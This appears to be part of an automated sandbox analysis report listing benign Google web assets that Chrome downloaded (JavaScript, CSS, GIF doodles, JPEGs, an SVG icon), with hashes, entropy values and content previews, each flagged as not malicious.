                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,E2VjNc,EEDORb,EFQ78c,FZTbYc,G0j0Je,GSlykd,GiFjve,I6YDgd,IZT63,Id96Vc,Izs65d,JE2clc,JNoxi,JPvYpc,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,MDB2J,MI6k7c,MJWMce,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PJgxJf,PrPYRd,QIhFr,Qnj3Pe,QqJ8Gd,RAnnUd,RMhBfe,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TJQ3Ud,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,Ulmmrd,UthHZe,V3dDOb,V8JnLd,VETAO,VwDzFe,WO9ee,XBRlNc,XVMNvd,YrN4Fb,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bD99Db,bYHiff,byfTOb,duFQFc,ehH0Pd,fKUV3e,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,i5dxUd,j4UNFc,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,rCcCxc,rPRh8e,s2VbJb,s39S4,soHxf,tjiVBd,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=GILUZe,a4GDlb,eYJrS,sJhETb,JH2zc,IjTJJb,fR6Vdb,bTi8wc,Tpj7Pb,u8fSBf,eM1C7d,rSlV0d,t1sulf,VNcg1e,DFTXbf,Xn16n,EF8pe,nKuFpb,xzbRj,JWUKXe,ZbunN,WYNSOe,R6UQsc,hmxKAd,P6Sgne,MY2OBe,Gkrb3e,MaBk4,HwavCb,ff8rzd,qRXAtf,CTfTTd,xdp6Ne,s2XCRc,onWwzb,CW8lw,UfGXTd,LP4cEc,Un38xf,dmy0Zb,ZH8ved,QKK0O,NufREb,LFynkb,XMsnSd,fKBXPe,tQX3bd,tQbu0,sGhhBd,ceo3ne,HruX3d,WCciof,jMem0b,JVNQkc,cPVRG,JNcm2e,M2suMc"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("GILUZe");.var QV=function(a){_.N.call(this,a.va);this.i=a.Xd.Vf};_.C(QV,_.N);QV.qa=function(){return{Xd:{Vf:function(){return new _.fi(function(a,b){_.OV().then(a,b)})}}}};QV.prototype.j=function(){1!=this.i.getStyle()&&this.i.close()};QV.prototype.click=function(a){_.Yu(a.event.target,"A")&&this.j();return!0};_.O(QV.prototype,"cOuCgd",function(){return this.click});_.O(QV.prototype,"Vtdxob",function(){return this.j});_.Sw(_.gwa,QV);._.p();._.k("a4GDlb");.var D1a=_.A("a4GDlb");var JU=function(a){_.N.call(this,a.va)};_.C(JU,_.N);JU.qa=function(){return{}};_.h=JU.prototype;_.h.f4=function(){this.notify(_.yTa)};_.h.g4=function(){this.notify(_.zTa)};_.h.p4=function(){this.notify(_.ATa)};_.h.q4=function(){this.notify(_.BTa)};_.h.s4=function(a){this.notify(_.CTa,a.data)};_.h.w4=function(a){this.notify(_.DTa,a.data)};_.h.HQ=function(a){this.Ea(_.B1a,{hc:a.data})};_.h.IQ
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1132 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):216988
                                                                                                                                                                                                                                                            Entropy (8bit):7.895211821926336
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:Fw8fF6ZU0Q6BMvzZPMZ3ZaZb2rXm9e81UYqImNWr5BkZ:SMZbZElcZc986YqIEuyZ
                                                                                                                                                                                                                                                            MD5:B6A6A23C2C5449859211639518CC6F8C
                                                                                                                                                                                                                                                            SHA1:744C1138950A454E7F34211978E020AD5E712006
                                                                                                                                                                                                                                                            SHA-256:56F83494607E0C6B6D7C703A864E04029CC42CBE4ABA96A3B6A624900DB9CCA2
                                                                                                                                                                                                                                                            SHA-512:01C5385424943A88B5E6A1B4A94C3660DB07A14FBDA707818B4079E0F8EAAF75BE9818E57E3E74DC3E0A97A26F0952C564BA3091DA44CDA321F0BCA1338C8BEA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2018/fall-equinox-2018-6545460612300800.2-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89al........M........._-.............F.(..%..:............<.......j...... ..oL............Q........-.3..O.....~...>.l....,.>.....U....B..........4.9.........2.9.......t....3.....I.....V...... ..=..t....E.l....,...;..5......B..W..........>.....q..E..`....)..0....k.....i..x....`...........;..O..Q......._.....2.....0....?....E...Q.S..o..,.,..}.=.......;...........:..w.......b..-..j..a......B....-.........Q....3....R..c..s.....s..8..W..Z.R.........|..Y....k.....:.&..%.....!..E....{..S....l..D.....z....Q..c..2..6..P..L.......B.G..w..9..O.P..R..........Q....W..[.....`..N..O..f...............J..s..X..d....`..T..[..I.....`....[..S........L....U.....e......................c..j.....j.!....5..T...!..NETSCAPE2.0.....!...*...,....l...@...)..H......*\....#J.H....3j.... C......k..T!.!..4$.fb)&..8s.....@...J...H.*.xm...I.0.J...T.41..... ..'......]...=,8@....x.........} .A..&9..R.....6.b.D.....c..d..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):27189
                                                                                                                                                                                                                                                            Entropy (8bit):7.709732872394779
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:xSqwghverKNReTNxQBfPJzIfJOxfJV2rgZrt:xShghdNg6fPhIxgP2at
                                                                                                                                                                                                                                                            MD5:E51382AFA03668725824029352888CB6
                                                                                                                                                                                                                                                            SHA1:713BEA4976BE1FDB0675DF9C84FE4E1A5D203521
                                                                                                                                                                                                                                                            SHA-256:93149C007DDE20D5C86EFE1BCEF396D819A8BCA714143E129170BCA783B32859
                                                                                                                                                                                                                                                            SHA-512:3E1ED076017765472B81882AFF76014EC8A8E0FE3E716D19242613213C2F1A1A6B480BBD81B63F2809F1E560E8B3C48F114F2628426A77C5F7A11448CDF34419
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.........................................................................................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):401
                                                                                                                                                                                                                                                            Entropy (8bit):4.740133908247468
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:tvcmdU/i3tLIsKd2aCJNfOQxNVtd7Svq6JwCA7V:tk2U/i3tv46vxNdSvqCw9V
                                                                                                                                                                                                                                                            MD5:E2DBF6370751567D561BB64649CB3342
                                                                                                                                                                                                                                                            SHA1:42792B6B81D2386B95F295CA7473C929CFE4FB0C
                                                                                                                                                                                                                                                            SHA-256:C1BD37E48A2AFA7523AED613951F5411A03DC1597344A9639DDAA4EFF32F0D7E
                                                                                                                                                                                                                                                            SHA-512:792FABC52F0D9DC8BDAC569C0AED7C6B61C29293B8EE43C62A50533F23EFE440C9EB4B34393D3BA82CBB32A99F43EA16ABBE2B187F9A88E013579194C43B4178
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/img/glue-help.svg
                                                                                                                                                                                                                                                            Preview:<svg id="help" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1092 x 430
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):304063
                                                                                                                                                                                                                                                            Entropy (8bit):7.9323912020972305
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:dgT8jECodEUNbM7KSYgJjXuNFS/6zxC7Jgn1NKFnNOPLLBfW9ic8xGihahR:dk8gTrNUKgSNESMJz7IPBfQnr
                                                                                                                                                                                                                                                            MD5:6F22BE4E029E93D82823665A482806B0
                                                                                                                                                                                                                                                            SHA1:3B85B34FF76BBA7F833E0C09FF96846615CAE73A
                                                                                                                                                                                                                                                            SHA-256:4049C498F790AFB44C422CA6A799DA70F1E78798B5E71B93692CA3DD0B6FF5FC
                                                                                                                                                                                                                                                            SHA-512:58B5B85C97BF57F9D1086E1DB888A5883A291E035ADEF1290D80ECA6F0F19C7901901F366342CBDF99D2D806104FC972812B9BA39BEB44349A95C6DCE67E186A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89aD........p..i..vv..x...goR..fBI4...hk_rug..SXJ...mpc..._dM...RY?}.s................i......6:+.....yz.\...z.c......<D0..{...........s...........[^T..}...(....s..v........{.....k....Vv~.b......:A,..it.Z`cZ.......1e..soqh}.j.........|H0.....rpuym................ehVS....^......~.v.......x}.]..l..ouca..|.....\ajK...5.......p..........q...UB>............s}U...w$..............v|b........j}}|.....IM8..SB,...U]C........qw.T}.[...........m..b..jx.Z......zto..~........_OI..o. .`iENY;...sum...........nwVIQ8..s...u..UAE2u.WNU>x}j.lm...^eG.....y}p..y...NU8U]<...Y_AY`GIO>]aF...MPF....}}uy}u...yynMQ:...}}o.........u........uEM4]aA...........]eAnyP...q.UKY4......YeG.........yyuIU8EL9..a.wa...bgSW]LlaI}ys.....l.............n..ugqLXh@..xqyh......!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/199
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):27393
                                                                                                                                                                                                                                                            Entropy (8bit):7.972219336319506
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bjHh3Q6DGKIgRb3IZmtxsThOTZNFPBChnZ8zL:vhnWgZ4Zmt+IHFZBzL
                                                                                                                                                                                                                                                            MD5:4E7106B38E48741D8FDE6011F483E9FF
                                                                                                                                                                                                                                                            SHA1:42A594D343A29EA6E4ED73C6917219AB444E0518
                                                                                                                                                                                                                                                            SHA-256:D091C9A0DD5A828572A9D8F3506B6B259DEF21D94800ACEEA1839CCFFD9A6256
                                                                                                                                                                                                                                                            SHA-512:395F097C4F93EEA91733373E80E6B08F58D643DA998F413B7663DCDB5A3E7D6DDCA4CBE8244CFAB4D15F69F51B548169FBB072D05C43C300964AFED365DB3A8D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/1lqAjjXuM384j0EfDi9U8Y1AfDe6nru7uxUwfMH-vyeD2aQLqvhxh8FuWbqfb-zhjhuSyljoATt1NjEGmRCbjbFE6XA1Fdb_oHWJNgGMxwFp_Dha8Eo
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................D.........................!..1AQ."aq...2...BR..#b....r..$3C....4c............................................................!.1.AQ.".a.2.Sq..3BR............?.....:..FS..F...R. Y`O..j.....F.j...QP..d..P6.%Z...$..u..&FJ...;.~....!\S$.#'A...GQ..f)./....#2.7...#7...8"...^I.5....WV5..2.$!.m=...["L.........Jn.MN...1.(....Z...]"..L.T....$..o..Y..T).V-&$.mJ.......y.}P-.....`.4A..i.Y@...e.....Q+h.e.#..5.CTk"J.YrQ.~...CDk%u._...j..e........qA..qKHF..@.$k4....p&..E...fv<;.X,lH...s..fr.1..8.-um..1.jg.{.8h.V8..3{..#u. w..O...Q%.#.d7......&..g./c...z.T....ie......1.....z..C..rg..7.&....`.^.'$.vlb.t..?.7.H..6.N+.&....&..i\I./',..a...q.}......3@..,I..$....!.[B.q\.W.].$.+.(g&....x.......X{.e=~.......Y@"f\.(X.5.....,*&\.....#dX.LL..0. H..Mf..{.c.7I....z... .r..'#3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (25228), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):25228
                                                                                                                                                                                                                                                            Entropy (8bit):5.545275407830557
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:gM78SUevMTjuFzouWaqWAlpTpdHjPtcnft:p7oevMX5HjPwft
                                                                                                                                                                                                                                                            MD5:5118E4EFF99867B199027E7EE49BD481
                                                                                                                                                                                                                                                            SHA1:7F315AB10B9D0CA73A98A810C272F405F87EC014
                                                                                                                                                                                                                                                            SHA-256:7DB470720BC87269E9BF81C2DA2649D4F59D54EB54CA5ED4547855758D6688A0
                                                                                                                                                                                                                                                            SHA-512:0F0E1417061B7157E5F32D660798C1A5815722F9EE27189FA72A95A7A820F71C7269D7CA42E430C75F41D55695D8BD68B4D74231479E846911714746AC8CCA59
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/_/translate_http/_/ss/k=translate_http.tr.69JJaQ5G5xA.L.W.O/d=0/rs=AN8SPfpC36MIoWPngdVwZ4RUzeJYZaC7rg/m=el_main_css
                                                                                                                                                                                                                                                            Preview:.VIpgJd-ZVi9od-ORHb-OEVmcd{left:0;top:0;height:39px;width:100%;z-index:10000001;position:fixed;border:none;border-bottom:1px solid #6B90DA;margin:0;box-shadow:0 0 8px 1px #999}.VIpgJd-ZVi9od-xl07Ob-OEVmcd{z-index:10000002;border:none;position:fixed;box-shadow:0 3px 8px 2px #999}.VIpgJd-ZVi9od-SmfZ-OEVmcd{z-index:10000000;border:none;margin:0}.goog-te-gadget{font-family:arial;font-size:11px;color:#666;white-space:nowrap}.goog-te-gadget img{vertical-align:middle;border:none}.goog-te-gadget-simple{background-color:#FFF;border-left:1px solid #D5D5D5;border-top:1px solid #9B9B9B;border-bottom:1px solid #E8E8E8;border-right:1px solid #D5D5D5;font-size:10pt;display:inline-block;padding-top:1px;padding-bottom:2px;cursor:pointer}.goog-te-gadget-icon{margin-left:2px;margin-right:2px;width:19px;height:19px;border:none;vertical-align:middle}.goog-te-combo{margin-left:4px;margin-right:4px;vertical-align:baseline}.goog-te-gadget .goog-te-combo{margin:4px 0}.VIpgJd-ZVi9od-l4eHX-hSRGPd,.VIpgJd-ZVi9od-
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1587), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1587
                                                                                                                                                                                                                                                            Entropy (8bit):4.847434837126422
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:32x32v2i2wvlZPASOA/O8VYA8VjZ8FuW5WxWBWzkGWS:GxGux/S5/ZajBeLsk03
                                                                                                                                                                                                                                                            MD5:426A3DCE379AF2EB9E37DB5309CD6412
                                                                                                                                                                                                                                                            SHA1:FC7FDB8796C3F6C0E81E02F16F3391F4F41720BC
                                                                                                                                                                                                                                                            SHA-256:40E60D753EFC158BE881B642A78FA2392F2FD3119BFE2DC7120EFDCB8F1C4621
                                                                                                                                                                                                                                                            SHA-512:211544BD8B07203F32ED7216814F8D61AD3EC132AC2D7A64045733940C786CBE45B406B60D980B8795500E39469FAC73892363858AF1C49963C5FDFF618B9133
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/css/year-in-search.min.css?cache=fc7fdb8
                                                                                                                                                                                                                                                            Preview:._-year-in-search-hub ._year-in-search-headline .blue{color:#4285f4}._-year-in-search-hub ._year-in-search-headline .green{color:#34a853}._-year-in-search-hub ._year-in-search-headline .red{color:#ea4335}._-year-in-search-hub ._year-in-search-headline .yellow{color:#f9ab00}._-year-in-search-hub section.glue-page:nth-child(n+3){display:none}._-year-in-search-hub .ligthbox-video-card,._-year-in-search-hub .modules-lib__card{height:100%}._-year-in-search-hub .glue-card__inner{text-align:center}._-year-in-search-hub .glue-card--list .glue-card__content .glue-headline.glue-headline--headline-5{font-size:16px;line-height:24px}@media (min-width:600px){._-year-in-search-hub .glue-card--list .glue-card__content .glue-headline.glue-headline--headline-5{font-size:16px;line-height:24px}}@media (min-width:600px){._-year-in-search-hub .glue-card:not(.glue-card--list) .glue-card__content .glue-headline.glue-headline--headline-5{font-size:24px;line-height:32px}}@media (min-width:1024px){._-year-in-sea
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2228), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2228
                                                                                                                                                                                                                                                            Entropy (8bit):5.0386287697439895
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:LqCZq3+q5OWx3VHqLggNx2dpb9lt99tccBtAhnjxPOnZzXgtrucFg8GFm88dEY8p:LUJVKL6MhnjhOpJcFg8Gp8dEY8UKl
                                                                                                                                                                                                                                                            MD5:6C0E4DA5DDE65F8DF310877C66DCF36D
                                                                                                                                                                                                                                                            SHA1:4EB615CC08D513BF0E672C69A72481612ACAFA87
                                                                                                                                                                                                                                                            SHA-256:887F7165CF934298584CADB5F4BB61B39BFDEC0779B9BE1C0EF517830A143F16
                                                                                                                                                                                                                                                            SHA-512:979ECA71A97B8A2F11FA0B9B0B588587AC19DD145F0E639EBC09D730CBC15AE417F8A75C1FACA1C2A9E1232B8BFCF05A418AA25EB0BDC21E82DCFFA3C36F2DBB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.iN01Z40G9Cg.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin,qhlo,qhmn,qhpc,qhpr,qhsf,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTsQlHCws7t2r7Egcs1hOau_HvMlbg"
                                                                                                                                                                                                                                                            Preview:.gb_Ve{background:rgba(60,64,67,.90);-webkit-border-radius:4px;border-radius:4px;color:#fff;font:500 12px "Roboto",arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000;-webkit-font-smoothing:antialiased}.gb_zc{text-align:left}.gb_zc>*{color:#bdc1c6;line-height:16px}.gb_zc div:first-child{color:white}.gb_Uc .gb_Qc{overflow:hidden}.gb_Uc .gb_Qc:hover{overflow-y:auto}.gb_Uc .gb_Qc::-webkit-scrollbar{width:16px;height:16px}.gb_Uc .gb_Qc::-webkit-scrollbar-button{height:0;width:0}.gb_Uc .gb_Qc::-webkit-scrollbar-button:start:decrement,.gb_Uc .gb_Qc::-webkit-scrollbar-button:end:increment{display:block}.gb_Uc .gb_Qc::-webkit-scrollbar-button:vertical:start:increment,.gb_Uc .gb_Qc::-webkit-scrollbar-button:vertical:end:decrement{display:none}.gb_Uc .gb_Qc::-webkit-scrollbar-corner{background-color:transparent}.gb_Uc .gb_Qc::-webkit-scrollbar-track{border:0 solid transparent;background-clip:padding-box;background-co
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 422
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):430232
                                                                                                                                                                                                                                                            Entropy (8bit):7.961079602432547
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:5JPXGhHrMfCJ2iMoRv4DeyoPPPR11JmB0yjHHtHAT29zpq:3XGoff4RQyFB1miyzNHU2BI
                                                                                                                                                                                                                                                            MD5:75F6E09B34840B023663BD47C42C29B7
                                                                                                                                                                                                                                                            SHA1:B909AEF7D737B26C536490D8B17C8B4D0FC0C467
                                                                                                                                                                                                                                                            SHA-256:BA5CC7F4614DC6D43B902D4661560B8408A527AAF45897E8C2AF18A45AA8C1F5
                                                                                                                                                                                                                                                            SHA-512:D84EEC1F932D6E1D306C9D55D439673A1CB60A09F0C440CFC5C5DFB2B0BFE670440DA7E2DAB38A939429A945D23DA6DF9EE12D4380D1EBDEA23BE586DD3E83D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2017/first-day-of-spring-2017-northern-hemisphere-5171021979058176-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a..........Wb..Z.I(4......(."...Zk9...........7.......W..e.Z..C.Y.Z.}....j....{....{...........7.I:......p..#....J.......E..=..../....U..lck....&....G..g......j......]66......w<..M..w.I.................e.kJ.........?.......w.:.........g..f..v...........c..g.......w......c........V....Y..W..y.........h.~....Q....Z.......xex.pV`....v..........h\EO..!....._.......u........pL......."..ck...h...g.ZZTf....C..(.....vS.V..*.4.cJ....<[c{..............V....J..Ul....O..H.......z......JE@............>{...C...........&.......v\..nv.............tu..as....k.........D?3..cs.............k...........!..........Z...|....a..............msz......l..3.......................F........)..k..fs....................!..NETSCAPE2.0.....!.......,............W..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (857)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):15236
                                                                                                                                                                                                                                                            Entropy (8bit):5.4677631693260915
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:VbMjUuDMY5C0+J8JWrw2diIqtY5I4eB7qJ:5tuDMY5767rw2ZqtY5Tea
                                                                                                                                                                                                                                                            MD5:849F90D36324FB183C165E94CD38585F
                                                                                                                                                                                                                                                            SHA1:224DC98464BDB985C9B83E9CBDD1D9CA2E99F0F8
                                                                                                                                                                                                                                                            SHA-256:5D03ADF18C659B0B5BDDC716157FCF1BE45D70AB1A7036E8B73168FBBCCC9DD3
                                                                                                                                                                                                                                                            SHA-512:680B7959832099F37F3348ED22E9F7A5FBB6DDB9B7CD5BCA8C8EB13FC98CF3875F2E4A565AB0BAFBDB604A68BF3EB0A4DD6A3283709BD2462FE0E4A05AB3CB29
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ssl.gstatic.com/inputtools/js/msgs/10/en.js
                                                                                                                                                                                                                                                            Preview:var a=a||{};a.global=this;a.isDef=function(b){return void 0!==b};a.exportPath_=function(b,c,d){b=b.split(".");d=d||a.global;b[0]in d||!d.execScript||d.execScript("var "+b[0]);for(var e;b.length&&(e=b.shift());)!b.length&&a.isDef(c)?d[e]=c:d=d[e]?d[e]:d[e]={}};a.define=function(b,c){a.exportPath_(b,c)};a.DEBUG=!0;a.LOCALE="en";a.TRUSTED_SITE=!0;a.STRICT_MODE_COMPATIBLE=!1;a.DISALLOW_TEST_ONLY_CODE=!a.DEBUG;a.ENABLE_CHROME_APP_SAFE_SCRIPT_LOADING=!1;.a.provide=function(b){if(a.isInModuleLoader_())throw Error("goog.provide can not be used within a goog.module.");a.constructNamespace_(b)};a.constructNamespace_=function(b,c){a.exportPath_(b,c)};a.VALID_MODULE_RE_=/^[a-zA-Z_$][a-zA-Z0-9._$]*$/;.a.module=function(b){if(!a.isString(b)||!b||-1==b.search(a.VALID_MODULE_RE_))throw Error("Invalid module identifier");if(!a.isInModuleLoader_())throw Error("Module "+b+" has been loaded incorrectly.");if(a.moduleLoaderState_.moduleName)throw Error("goog.module may only be called once per module.");a.m
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):883280
                                                                                                                                                                                                                                                            Entropy (8bit):7.924993338061191
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:fZao9Dk9ss7SXYWG45Yy9pBMgD3lHKMFUWlVAf5K:U2Drs7+G4eqpBMmVqM1Af5K
                                                                                                                                                                                                                                                            MD5:5E47F7881BDAE68D3AE95E13E643CAF6
                                                                                                                                                                                                                                                            SHA1:6C7297B024AA331B589C809564491BA43A44EC94
                                                                                                                                                                                                                                                            SHA-256:1D65362BAA4D05A7166337FD0AA916D9A56CACD03323A4EDB1FB824C74C7009F
                                                                                                                                                                                                                                                            SHA-512:2B0A1B165262D711D8AF2F8F070A3D30B8E24352C9C195DA4ACF4C2C431DF2CCB0C441CC6FE19BD342F7CD1F029CCFF74137A55891495BE8715BC3163846BF62
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
